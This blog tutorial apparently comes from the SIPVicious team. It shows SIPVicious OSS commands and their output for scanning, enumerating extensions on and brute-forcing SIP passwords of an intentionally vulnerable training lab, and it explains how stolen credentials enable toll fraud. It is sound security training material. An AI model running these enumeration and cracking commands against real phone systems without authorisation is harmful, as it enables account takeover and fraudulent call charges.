TL;DR
We use SIPVicious OSS to scan, enumerate extensions, and crack passwords on our DVRTC vulnerable lab at pbx1.dvrtc.net. If you want to get your hands dirty with VoIP security testing, this is a good place to start.
Background
Back in 2020, our colleague Pinaki wrote a tutorial on attacking a VoIP system with SIPVicious OSS using our old demo server at demo.sipvicious.pro. That server has since been retired.
We now have something much better: DVRTC (Damn Vulnerable Real-Time Communications), a full vulnerable VoIP/WebRTC lab with guided exercises and a public instance at pbx1.dvrtc.net. DVRTC packs Kamailio, Asterisk, rtpengine, coturn, and more. All intentionally misconfigured for training purposes.
This post focuses on the SIPVicious OSS basics. For the full range of exercises (RTP bleed, TURN abuse, digest leak, and more), check the DVRTC exercise docs.
Getting started
SIPVicious OSS (SVOSS) is freely available on our GitHub. Install it with:
pip install sipvicious
Make sure you have the latest version (v0.3.7 at time of writing):
sipvicious_svmap --version
You’ll need Python 3.6 or later. For full details, see the installation wiki.
Reconnaissance with svmap
The first step in any VoIP pentest is figuring out what we’re dealing with. Let’s map our target with svmap:
sipvicious_svmap pbx1.dvrtc.net
+---------------------+---------------------------------+
| SIP Device | User Agent |
+=====================+=================================+
| 139.162.183.14:5060 | kamailio (6.1.1 (x86_64/Linux)) |
+---------------------+---------------------------------+
So we have a Kamailio 6.1.1 server handling SIP over UDP, sitting in front of the rest of the stack as a SIP proxy.
Now, what happens when we target a specific extension? Let’s try 1000:
sipvicious_svmap pbx1.dvrtc.net -e 1000
+---------------------+---------------------------------------------+
| SIP Device | User Agent |
+=====================+=============================================+
| 139.162.183.14:5060 | Asterisk PBX 22.8.2+dfsg+~cs6.15.60671435-1 |
+---------------------+---------------------------------------------+
A completely different User-Agent! The request for extension 1000 gets routed through Kamailio to an Asterisk PBX behind it. This is a pretty standard SIP proxy + PBX deployment. From the perspective of a pentester, knowing what sits behind the proxy is valuable information, and in this case the routing through Kamailio reveals exactly what’s behind it.
Enumerating extensions with svwar
Now that we have a feel for the target, let’s enumerate the extensions with svwar:
sipvicious_svwar pbx1.dvrtc.net -e 1000-2000
+-----------+----------------+
| Extension | Authentication |
+===========+================+
| 1000 | reqauth |
+-----------+----------------+
| 1100 | reqauth |
+-----------+----------------+
| 1200 | reqauth |
+-----------+----------------+
| 1300 | reqauth |
+-----------+----------------+
| 2000 | reqauth |
+-----------+----------------+
svwar found 5 extensions, all requiring authentication. It works by sending SIP REGISTER requests and looking at what comes back: a 401 means the extension exists (but needs credentials), while a 404 means it doesn’t. In fact, if you run svwar with the -vv flag, you’ll notice the server responds with 404 enumerate me baby for invalid extensions. Yes, that’s intentional ;-)
Cracking passwords with svcrack
We have extensions, so the obvious next question is: do any of them have weak passwords? That’s what svcrack is for. Let’s try the default numeric range first:
sipvicious_svcrack pbx1.dvrtc.net -u 1000 -v
INFO:ASipOfRedWine:trying to get self ip .. might take a while
INFO:root:scan started at 2026-04-12 16:25:39.014348
INFO:ASipOfRedWine:no more passwords
WARNING:root:found nothing
INFO:root:Total time: 0:00:18.189742
Nothing. The default password set is a numeric range from 100 to 999, which isn’t large enough. Let’s try the --enabledefaults flag, which adds common passwords (including the extension number itself and predictable patterns):
sipvicious_svcrack pbx1.dvrtc.net -u 1000 --enabledefaults -v
INFO:ASipOfRedWine:trying to get self ip .. might take a while
INFO:root:scan started at 2026-04-12 16:25:12.235809
INFO:ASipOfRedWine:The password for 1000 is 1500
INFO:root:we have 1 cracked users
INFO:root:Total time: 0:00:00.168962
+-----------+----------+
| Extension | Password |
+===========+==========+
| 1000 | 1500 |
+-----------+----------+
There we go! Extension 1000 has a password of 1500. You could also find this by specifying a custom numeric range with --range:
sipvicious_svcrack pbx1.dvrtc.net -u 1000 --range 1000-2000 -v
INFO:ASipOfRedWine:trying to get self ip .. might take a while
INFO:root:scan started at 2026-04-12 16:25:25.094604
INFO:ASipOfRedWine:The password for 1000 is 1500
INFO:root:we have 1 cracked users
INFO:root:Total time: 0:00:04.524195
+-----------+----------+
| Extension | Password |
+===========+==========+
| 1000 | 1500 |
+-----------+----------+
What can an attacker do with SIP credentials?
On a production PBX connected to PSTN, the most common outcome is toll fraud: the attacker registers with the stolen extension and starts making international or premium-rate calls. The victim gets stuck with the phone bill. We’ve seen cases where this leads to tens of thousands in charges over a weekend. It’s been happening for years and it’s still one of the most common VoIP attacks.
DVRTC is not connected to PSTN (of course), so no expensive calls here. But the techniques are the same ones an attacker would use against a real target.
Going further
This tutorial only covers the basics. DVRTC has 7 exercises covering 12 attack paths, including traffic analysis, RTP bleed, SIP digest leak, TURN relay abuse, and offline credential cracking. You can also run your own DVRTC instance locally with Docker Compose if you want a private lab to experiment with.
Of course, if what you actually need is a professional VoIP penetration testing service, get in touch ;-)
